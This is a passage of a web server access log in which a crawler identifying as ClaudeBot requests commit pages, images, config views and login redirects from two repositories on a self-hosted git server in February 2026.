Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11520] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm" [Client 216.73.216.188] [Length 23383] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 11682] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fmail_contact.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 216.73.216.188] [Length 14648] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 15740] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 216.73.216.188] [Length 10114] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13216] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 216.73.216.188] [Length 11703] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 216.73.216.188] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11281] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 216.73.216.188] [Length 10605] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 